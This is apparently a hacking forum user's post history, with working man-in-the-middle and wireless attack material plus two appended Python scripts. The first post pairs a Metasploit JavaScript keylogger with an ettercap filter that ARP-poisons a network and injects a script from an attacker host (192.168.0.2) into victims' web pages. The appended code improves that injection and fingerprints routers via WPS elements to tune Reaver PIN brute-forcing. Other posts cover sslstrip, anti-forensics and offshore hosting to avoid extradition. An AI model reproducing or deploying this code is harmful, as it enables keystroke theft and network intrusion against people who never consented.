Diggs

Active Members, 36 posts
  1. The Middler

    I've spent a bit of time working on the Middler issues for a while and haven't gotten to the bottom of them. The Python parsing is both slow and mildly buggy, and the results just haven't shown up for a standalone application which can accomplish what I was hoping for. In the meantime, I found that the Metasploit http_javascript_keylogger has been added back to the stable branch. Combined with some good ettercap filters, you can append either the Java modules or the keylogger script and it's much, much faster.

    First, we need to generate the JavaScript keylogger and set up a handler in Metasploit for it. This is under:

        use auxiliary/server/capture/http_javascript_keylogger

    For some more details on using the module, look here: https://community.rapid7.com/community/metasploit/blog/2012/02/21/metasploit-javascript-keylogger

    Setting this up properly will set up the JavaScript in a random folder under /var/www and create a handler for the returned characters.

    The next step is to insert it into the stream. The ettercap filter I have been playing with looks like this:

        # jsEmbed.filter
        # Outbound requests: mangle Accept-Encoding so the server answers uncompressed.
        # "Accept-Nothing!" is the same length as "Accept-Encoding", so the segment size is unchanged.
        if (ip.proto == TCP && tcp.dst == 80) {
            if (search(DATA.data, "Accept-Encoding")) {
                replace("Accept-Encoding", "Accept-Nothing!");
            }
        }
        # Inbound responses: append the keylogger script right after the closing head tag
        # (both lowercase and uppercase spellings are handled).
        if (ip.proto == TCP && tcp.src == 80) {
            if (search(DATA.data, "</head>")) {
                replace("</head>", "</head><script src=\"http://192.168.0.2/qZBRDzd/test.js\"></script> ");
            }
            if (search(DATA.data, "</HEAD>")) {
                replace("</HEAD>", "</HEAD><script src=\"http://192.168.0.2/qZBRDzd/test.js\"></script> ");
            }
        }

    The qZBRDzd/test.js is the file which is created from the Metasploit module. This can be compiled with etterfilter:

        etterfilter jsEmbed.filter -o jsEmbed.ef

    So, we've got a filter that will insert the JavaScript src right after the head of a document. We now need to run ettercap and MITM the network. You will need to set up IP forwarding:

        echo 1 > /proc/sys/net/ipv4/ip_forward

    And make sure ettercap is set up in etter.conf to handle iptables. Look that part up if you are new to it. Now run ettercap:

        ettercap -T -q -F jsEmbed.ef -M ARP // //

    With this setup, I've found what I originally wanted in the Middler and also used a couple of well known and stable products instead of a one-off demo for a con. If there are any fun ideas or improvements, let me know.
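The two rewrites the filter in the post performs, redone in Python over raw HTTP bytes, as an added example that is not part of Diggs's post and not ettercap or Metasploit code. It goes a little further than the filter: it matches the closing head tag in any case, decompresses a gzip body if the server sent one anyway, and recomputes Content-Length, which the filter's replace() does not touch (a body that grows past the advertised length gets truncated by the browser). The script URL is the one from the filter; the request, page and responses are constructed samples, not captures.

```python
import gzip
import re

# Script tag the post's filter injects (URL taken from the filter itself)
SCRIPT_TAG = b'<script src="http://192.168.0.2/qZBRDzd/test.js"></script>'
HEAD_CLOSE = re.compile(rb"</head\s*>", re.IGNORECASE)


def neutralize_accept_encoding(request: bytes) -> bytes:
    """Rename the Accept-Encoding header so the server replies with a plain body.
    'Accept-Nothing!' is the same length as 'Accept-Encoding', so the request
    keeps its size, which is why the post's filter picks that replacement."""
    head, sep, body = request.partition(b"\r\n\r\n")
    lines = []
    for line in head.split(b"\r\n"):
        name, colon, value = line.partition(b":")
        if colon and name.lower() == b"accept-encoding":
            line = b"Accept-Nothing!" + colon + value
        lines.append(line)
    return b"\r\n".join(lines) + sep + body


def inject_script(response: bytes, tag: bytes = SCRIPT_TAG) -> bytes:
    """Insert `tag` after the first </head> (any case) of an HTTP response.
    Gzip bodies are decompressed and sent on plain; Content-Length is fixed up.
    Chunked bodies and responses without a head tag are returned unchanged."""
    head, sep, body = response.partition(b"\r\n\r\n")
    if not sep:
        return response
    status, *headers = head.split(b"\r\n")
    names = {h.partition(b":")[0].strip().lower(): h.partition(b":")[2].strip().lower()
             for h in headers}
    if b"chunked" in names.get(b"transfer-encoding", b""):
        return response  # would need de-chunking first; out of scope here
    gzipped = b"gzip" in names.get(b"content-encoding", b"")
    if gzipped:
        try:
            body = gzip.decompress(body)
        except (OSError, EOFError):
            return response  # not a complete gzip stream in this buffer
    new_body, n = HEAD_CLOSE.subn(lambda m: m.group(0) + tag, body, count=1)
    if n == 0:
        return response
    out = [status]
    for h in headers:
        name = h.partition(b":")[0].strip().lower()
        if name == b"content-encoding" and gzipped:
            continue  # body is plain now
        if name == b"content-length":
            h = b"Content-Length: " + str(len(new_body)).encode()
        out.append(h)
    return b"\r\n".join(out) + sep + new_body


# Constructed samples (hypothetical host, not captured traffic)
PAGE = b"<html><HEAD><title>x</title></HEAD><body>hello</body></html>"
SAMPLE_REQUEST = (b"GET / HTTP/1.1\r\nHost: example.test\r\n"
                  b"Accept-Encoding: gzip, deflate\r\n\r\n")


def build_response(page: bytes = PAGE, gzipped: bool = False) -> bytes:
    """Build a constructed server response, optionally gzip-encoded."""
    body = gzip.compress(page) if gzipped else page
    hdrs = [b"HTTP/1.1 200 OK", b"Content-Type: text/html"]
    if gzipped:
        hdrs.append(b"Content-Encoding: gzip")
    hdrs.append(b"Content-Length: " + str(len(body)).encode())
    return b"\r\n".join(hdrs) + b"\r\n\r\n" + body


if __name__ == "__main__":
    print(neutralize_accept_encoding(SAMPLE_REQUEST).decode())
    print(inject_script(build_response(gzipped=True)).decode())
```

Run it as a script to see both rewrites; the second call shows a gzip response coming back plain with the tag after </HEAD> and a corrected Content-Length.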
  2. I'm looking at setting up a laptop so I can connect to one of the wireless cards attached to it and ssh into the laptop directly from the wireless connection. Is there a specific term I should be searching for setting up a direct wireless connection without bridging to allow an ssh connection? Thanks
  3. Can anyone confirm sauce on this? I'm always a bit reluctant to install a package that doesn't provide any sourcefiles on Sourceforge. Other than that, this seems like an interesting project and something I was looking around to get for a while.
  4. I have used Reaver. The reason I was asking was so that I could fine tune the reaver settings. The MAC address gives the Manufacturer, but not the model. I started looking through an airodump of the Reaver working and found that I could actually find the Make, Model and firmware version of the router in the pcap file. I was using vi, but I bet if you fired up Wireshark, you could find a lot more info. With this, I can start looking up WPS pin prefixes and the Reaver settings. I would highly recommend this as a step to fine tuning the Reaver attack.
  5. I have a couple questions about the following demo: http://partners.immunityinc.com/movies/SILICA-WPS.mov So basically, Silica has a tab to get more information from the WAP which they are interested in. This includes the make, model and series of WPS pins that have been seen. This allows a user to fine tune the attack. I am interested in if anyone knows how they get the exact make and model off of an unconnected Wireless router and if anyone else has WPS pin-lists to help narrow down the range of pins. I have looked into MAC address lookups, but they identify the make and don't provide much information on the model. Is there any way of analyzing either packets or banners off of an unconnected router to identify it? If anyone here works for Immunity, big ups on Canvas, the Debugger and Silica. If you have a $3400 off coupon, toss it my way. Has anyone else started a WPS Pin list? I could see this being incredibly useful for pattern matching.
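The make, model and firmware strings that the Reaver post above pulled out of an airodump pcap, and that the Silica demo in this post displays, travel in the WPS information element (vendor-specific tag, OUI 00:50:F2 type 4) of the AP's beacons and probe responses, so no association is needed to read them. Added example, not code from Diggs's posts, Reaver, airodump or Immunity: a parser for that element over a frame's tagged parameters, returning the identifying attributes plus the AP Setup Locked flag that decides whether a Reaver run will get rate-limited. The frame is constructed for a hypothetical AP, not a real capture.

```python
import struct

WPS_OUI = b"\x00\x50\xf2\x04"  # Microsoft OUI 00:50:F2, vendor type 4 = WPS

# WPS attribute IDs (Wi-Fi Simple Configuration spec) that identify the device
WPS_ATTRS = {
    0x1011: "device_name",
    0x1021: "manufacturer",
    0x1023: "model_name",
    0x1024: "model_number",
    0x1042: "serial_number",
    0x104A: "version",
    0x1044: "wps_state",        # 1 = not configured, 2 = configured
    0x1057: "ap_setup_locked",  # 1 = AP has locked WPS (Reaver will be rate-limited)
}
BYTE_ATTRS = {"version", "wps_state", "ap_setup_locked"}


def iter_ies(tagged: bytes):
    """Yield (element_id, payload) for each 802.11 IE in a tagged-parameters blob."""
    off = 0
    while off + 2 <= len(tagged):
        eid, length = tagged[off], tagged[off + 1]
        payload = tagged[off + 2: off + 2 + length]
        if len(payload) != length:
            break  # truncated element: stop instead of misparsing
        yield eid, payload
        off += 2 + length


def parse_wps_ie(payload: bytes) -> dict:
    """Parse the big-endian TLV attributes that follow the OUI+type in a WPS IE."""
    out = {}
    off = 0
    while off + 4 <= len(payload):
        attr_id, attr_len = struct.unpack(">HH", payload[off:off + 4])
        value = payload[off + 4: off + 4 + attr_len]
        if len(value) != attr_len:
            break
        name = WPS_ATTRS.get(attr_id)
        if name in BYTE_ATTRS:
            out[name] = value[0] if value else None
        elif name:
            out[name] = value.decode("utf-8", "replace").rstrip("\x00")
        off += 4 + attr_len
    return out


def wps_device_info(tagged: bytes) -> dict:
    """Locate the WPS IE in a beacon/probe-response and return its device fields."""
    for eid, payload in iter_ies(tagged):
        if eid == 0xDD and payload.startswith(WPS_OUI):
            return parse_wps_ie(payload[len(WPS_OUI):])
    return {}


def wps_attr(attr_id: int, value: bytes) -> bytes:
    return struct.pack(">HH", attr_id, len(value)) + value


def build_sample_tagged() -> bytes:
    """Constructed sample: SSID IE plus a WPS IE for a hypothetical AP (not a real capture)."""
    ssid = bytes([0x00, 7]) + b"TestNet"
    wps = WPS_OUI + b"".join([
        wps_attr(0x104A, b"\x10"),                    # Version 1.0
        wps_attr(0x1044, b"\x02"),                    # configured
        wps_attr(0x1021, b"ExampleCorp"),             # Manufacturer
        wps_attr(0x1023, b"WR-1000"),                 # Model Name
        wps_attr(0x1024, b"1.02.3"),                  # Model Number (often the firmware rev)
        wps_attr(0x1011, b"ExampleCorp Wireless Router"),
        wps_attr(0x1057, b"\x00"),                    # AP Setup Locked: no
    ])
    return ssid + bytes([0xDD, len(wps)]) + wps


if __name__ == "__main__":
    print(wps_device_info(build_sample_tagged()))
```

Feed it the tagged-parameters bytes of a beacon (in Wireshark, the same fields show under the vendor-specific tag as "Manufacturer", "Model Name", "Model Number" and "Device Name"); the manufacturer and model are what you then use to pick a PIN prefix list, and a non-zero ap_setup_locked is the reason to slow Reaver down or wait.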
  6. Sslstrip

    You probably need to set the permissions for that file to execute. There are two ways to fix this.

    First method: run 'python ./sslstrip.py -l 8080'. Python will read the script and run it.

    Second method: first, find out what the permissions currently are with 'ls -ltr sslstrip.py' in the directory you have sslstrip.py in. You should have rwxrw-rw- for that to run natively. Try 'sudo chmod 755 sslstrip.py', then run './sslstrip.py -l 8080'.

    Basically, this is happening because the file is readable, but not executable. You should set it to executable to run without the 'python' command prepended. Otherwise, python will be executed and it will just read the sslstrip.py script. Let me know if that makes sense.
  7. I would make sure that ettercap is up to the current version. The L3 errors show up with the older version when there is a conflict with a newer Linux kernel.
  8. You should also check out int0x80's talk on Anti-Forensics. He sets up some scripts to automatically delete the usb drives when they show up. There might be something in his checksum that would prevent the driver from firing if it's not in the whitelist.
  9. This is kind of a known issue with sslstrip. It shows up when an SSL connection has been closed at an unexpected time. It pops up pretty regularly, but can be ignored. I would suggest upgrading to 0.9, which is the most recent version: http://www.thoughtcrime.org/software/sslstrip/ I would also make sure that ettercap is upgraded if you are using it. Otherwise it acts really funny with newer versions of the Linux kernel.
  10. The Middler

    Ach, now it's been moved to the unstable branch.
  11. For fun, you can also read up on the new hash collisions. If you can understand that, then you'll probably be able to get DDoS in general. Plus, it'll get you a bit more into code development. There has also been some DNS-based DoS work you could look at. You might also want to specify what you are looking to do. I imagine that you might be trying to get into something and not coming at it in the best direction. I would advise a lot of caution though. Plenty of people who thought they were good are in jails right now for not being smart enough about what illegal things seemed like fun.
  12. The Middler

    I've been working on a couple of irritating things with the Middler code and then ran across this: http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/auxiliary/server/capture/javascript_keylogger.rb Metasploit MitM keylogger. I'll see if I can get the Middler code working still, but this seems like it pretty much covers what I was hoping to do.
  13. You might also want to try a Python script. I know I've used them to communicate over serial before and it has Serial libraries which aren't too tough.
  14. If you are really careful, you could pick a country which doesn't share extradition treaties with the US. They will probably be hostile, so getting data from that server will also be more difficult. If you are super paranoid, there are some advantages to being off-shore. They are offset by dealing with foreign bodies and all the headache that can entail. You could also set up an Amazon EC2 micro-instance which has decent bandwidth and is free-ish. Depending on how much you are using it, you could use it as an ssh pivot and I bet it would get you by.
  15. Trace Alert

    I know Whisper Systems does full disk encryption on a smartphone. You could set that up with the encrypted SMS and Skype to get things pretty well secured. I think I've just found the tipping point of paranoia vs. cheapness. Buy a burn phone every week to avoid getting monitored by the Feds? Meh, I'll just let Agent Stanley listen to me talk to all my buddies.